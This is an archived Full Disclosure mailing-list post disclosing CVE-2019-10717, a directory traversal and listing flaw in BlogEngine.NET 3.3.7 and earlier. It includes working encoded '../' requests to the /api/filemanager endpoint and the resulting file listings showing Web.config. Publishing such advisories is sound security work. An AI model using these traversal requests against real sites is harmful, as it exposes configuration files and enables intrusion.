| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CA+Ma4JtxC9EB_ot_QV9jPyNf=R-XweRgQGQzfh4p-h0HJD4eDw@mail.gmail.com>
Date: Mon, 24 Jun 2019 17:42:26 -0600
From: aaron bishop <abishop@...ux.com>
To: fulldisclosure@...lists.org
Subject: [FD] BlogEngine.NET 3.3.7 and earlier Directory Traversal + Listing
*CVE-2019-10717* - A Directory Traversal + Directory Listing exists on
BlogEngine.Net 3.3.7 and earlier through the *path* parameter used by the
/api/filemanager endpoint. A request such as:
https://$HOST/api/filemanager?path=*%2F..%2f..%2f*
Discloses the contents of the application root:
....
{
"IsChecked": false,
"SortOrder": 25,
"Created": "5/26/2018 1:53:02 PM",
"Name": "Web.config",
"FileSize": "19.41 kb",
"FileType": 1,
"FullPath": "/../../Web.config",
"ImgPlaceholder": "fa fa-file-o"
},
....
The contents of additional directories can be viewed by modifying the path:
https://$HOST/api/filemanager?path=*%2F..%2f..%2fContent*
...
{
"IsChecked": false,
"SortOrder": 15,
"Created": "3/30/2019 9:09:23 PM",
"Name": "toastr.scss",
"FileSize": "6.92 kb",
"FileType": 1,
"FullPath": "/../../Content/toastr.scss",
"ImgPlaceholder": "fa fa-file-o"
}
...
Disclosure:
https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists